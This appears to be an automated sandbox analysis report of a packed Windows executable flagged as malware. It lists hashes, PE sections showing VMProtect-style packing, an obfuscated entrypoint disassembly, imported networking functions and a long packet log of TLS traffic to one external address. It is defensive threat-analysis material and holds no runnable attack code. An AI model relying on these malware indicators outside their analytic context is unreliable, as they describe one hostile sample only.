Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..3.{...............................................................................................................................................................................................................................................................................................................................................?.%.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.960560614280262
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	SecuriteInfo.com.FileRepMalware.1111.23697.exe
File size:	5'805'568 bytes
MD5:	d4d645cb0c89359d63a331158cb81eed
SHA1:	d05da1f86a6de7d2fcb6c6e87aa7390ced599b63
SHA256:	5817ef3fabfb94cb2458ef826416d99a14f9633239bd4959b3bf3a6ec4c20731
SHA512:	0e8a282f2efdd4e8c040612b34755956f870883b68576d7109c395b72f0cf57e9762431300c50d6f56e6d95449c9d1eb9a92e83ccdfae7fae3553e530f6a8b8d
SSDEEP:	98304:EjmuD6AUjbVoQqMXZlahyOYWpVh+2z8oXyK2FsLo+LCRoNi6:VAUvVzZl6Yqh+2FXx2azL
TLSH:	3E46233326750209E0E58C3DC5277ED431F61F668A80A879B7EAFDD53A324E5A213E43
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q.c.................\|...~........B...........@..........................@................@.........................O..

File Icon


Icon Hash:	7ccec4e4cc4cce3d

Static PE Info

General

Entrypoint:	0x82959e
Entrypoint Section:	.vmp1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x639071D1 [Wed Dec 7 10:58:25 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	2418e2826196e89e8cb5f53b8796c1cf

Entrypoint Preview

Instruction
push EFBC31E9h
call 00007F424496ED2Dh
xor ecx, ebx
cmp cx, bx
cmc
stc
neg ecx
cmc
stc
rol ecx, 03h
clc
not ecx
stc
rol ecx, 1
clc
jmp 00007F4244A39AA8h
jmp 00007F42445B74F8h
dec eax
clc
stc
test sp, 64C0h
xor eax, 3B3F0B4Bh
cmc
cmp cx, 75A0h
test ebp, edx
neg eax
cmp esi, 681118D5h
xor ebx, eax
test dx, bx
cmc
add esi, eax
jmp 00007F4244A1C88Eh
inc ecx
not ebp
inc ecx
ror ebp, 1
inc ecx
xor ebp, 73B224B8h
jmp 00007F42444FF977h
jmp 00007F424461E5C8h
add edi, edx
jmp 00007F4244517606h
jne 00007F42445CABB3h
mov eax, dword ptr [ebp+00h]
jmp 00007F424463D9A4h
cmp ch, FFFFFFF4h
bswap eax
stc
sub eax, 33021F18h
stc
jmp 00007F42446210DEh
xor eax, 268C4454h
ror eax, 1
inc cx
cmp ebp, esi
push ebp
add ebp, 263E32C7h
xor dword ptr [esp], eax
pop ebp
stc
dec eax
arpl ax, ax
cmc
clc
dec eax
add ebx, eax
jmp 00007F424452EA80h
push ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x9585c0	0xc4f	.vmp1
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4e3d30	0x190	.vmp1
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x97e000	0x53b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x408000	0xc8	.vmp1
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x97ac1	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x99000	0xf06e	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa9000	0x86b8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp0	0xb2000	0x347b45	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.vmp1	0x3fa000	0x583d30	0x583e00	cdcbec1abffae85b83c5fca9a0f14f29	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x97e000	0x53b8	0x5400	8d0c7f8b39d45ebdb297321017a7a9ab	False	0.35030691964285715	data	5.858993262498172	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x97e310	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.47349906191369606
RT_ICON	0x97f3b8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.22468879668049793
RT_ICON	0x981960	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.7039007092198581
RT_ICON	0x981dc8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6941489361702128
RT_ICON	0x982230	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6622340425531915
RT_ICON	0x982698	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6453900709219859
RT_ICON	0x982b00	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.6655405405405406
RT_GROUP_ICON	0x982c28	0x30	data	English	United States	0.875
RT_GROUP_ICON	0x982c58	0x14	data	English	United States	1.25
RT_GROUP_ICON	0x982c6c	0x14	data	English	United States	1.25
RT_GROUP_ICON	0x982c80	0x14	data	English	United States	1.25
RT_GROUP_ICON	0x982c94	0x14	data	English	United States	1.25
RT_VERSION	0x982ca8	0x21c	data	English	United States	0.4925925925925926
RT_MANIFEST	0x982ec4	0x4f4	ASCII text, with very long lines (1268), with no line terminators	English	United States	0.4755520504731861

Imports

DLL	Import
WSOCK32.dll	gethostbyname
WINMM.dll	mixerGetLineInfoA
VERSION.dll	GetFileVersionInfoA
COMCTL32.dll	ImageList_Create
PSAPI.DLL	GetModuleBaseNameA
WININET.dll	InternetOpenA
KERNEL32.dll	GetVersionExW
USER32.dll	SetWindowTextW
GDI32.dll	GetPixel
COMDLG32.dll	CommDlgExtendedError
ADVAPI32.dll	RegDeleteKeyA
SHELL32.dll	DragQueryPoint
ole32.dll	OleInitialize
OLEAUT32.dll	SafeArrayGetLBound
WTSAPI32.dll	WTSSendMessageW
KERNEL32.dll	VirtualQuery
USER32.dll	GetProcessWindowStation
KERNEL32.dll	LocalAlloc, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
USER32.dll	GetProcessWindowStation, GetUserObjectInformationW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 5, 2024 03:36:11.367325068 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:11.367369890 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:11.367430925 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:11.737627983 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:11.737652063 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:12.430121899 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:12.430299997 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:12.906377077 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:12.906416893 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:12.906723022 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:12.906778097 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:12.913981915 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:12.956512928 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.256715059 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.256777048 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.256803989 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.256841898 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.256859064 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.256874084 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.256887913 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.256916046 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.256922960 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.256963968 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.257591963 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.257643938 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.257649899 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.257688046 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.258546114 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.258584976 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.258593082 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.258599997 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.258634090 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.258667946 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.345607042 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.345671892 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.345681906 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.345727921 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.346199989 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.346246958 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.346280098 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.346321106 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.346549988 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.346595049 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.346601009 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.346641064 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.347064972 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.347111940 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.347117901 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.347156048 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.347157955 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.347168922 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.347225904 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.347799063 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.347839117 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.347845078 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.347882032 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.347889900 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.347928047 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.348653078 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.348699093 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.348705053 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.348737001 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.348742962 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.348750114 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.348773003 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.348805904 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.349426985 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.349473953 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.349479914 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.349488974 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.349523067 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.349549055 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.434622049 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.434678078 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.434694052 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.434704065 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.434871912 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.434871912 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.435319901 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.435364008 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.435369968 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.435376883 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.435400009 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.435425043 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.435435057 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.435477972 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.436193943 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.436243057 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.436249971 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.436283112 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.436286926 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.436294079 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.436314106 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.436342955 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.436436892 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.436484098 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.436491966 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.436533928 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.436539888 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.436580896 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.436738968 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.436781883 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.436784029 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.436790943 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.436815023 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.436841965 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.436846972 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.436882019 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.436887980 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.436927080 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.438730955 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.438774109 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.438783884 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.438791037 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.438807011 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.438832998 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.438839912 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.438880920 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.438883066 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.438891888 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.438916922 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.438940048 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.438987970 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439023972 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439028978 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439059019 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439085960 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439095974 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439102888 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439129114 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439131021 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439150095 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439155102 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439172029 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439182997 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439202070 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439210892 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439233065 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439246893 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439255953 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439263105 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439271927 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439297915 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439304113 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439337015 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439342976 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439348936 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439371109 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439389944 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439392090 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439400911 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439425945 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439438105 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439440012 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.439445972 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.439481020 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.523849010 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.523942947 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.523962021 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.524005890 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.524426937 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.524467945 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.524475098 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.524487019 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.524502993 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.524538994 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.524600983 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.524647951 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.524655104 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.524692059 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.525176048 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.525217056 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.525224924 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.525232077 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.525248051 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.525271893 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.525408983 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.525454998 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.526046038 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.526117086 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.526163101 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.526202917 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.526202917 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.526212931 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.526237011 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.526257992 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.526340008 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.526384115 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.526401997 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.526420116 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.526449919 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.526473045 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.526571989 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.526618004 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.526624918 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.526654959 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.526664972 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.526673079 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.526685953 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.526714087 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.526894093 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.526947975 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.526953936 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.526997089 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.527004957 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527031898 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527043104 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.527050018 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527076960 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.527092934 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.527194023 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527236938 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.527246952 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527286053 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.527332067 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527375937 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.527378082 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527386904 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527410030 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.527436018 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.527441978 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527481079 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527482986 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.527491093 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527513981 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.527539968 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.527542114 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527550936 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527579069 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.527585983 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527625084 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.527631044 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.527690887 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.528170109 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.528213024 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.528219938 CEST	443	49730	140.82.121.3	192.168.2.4
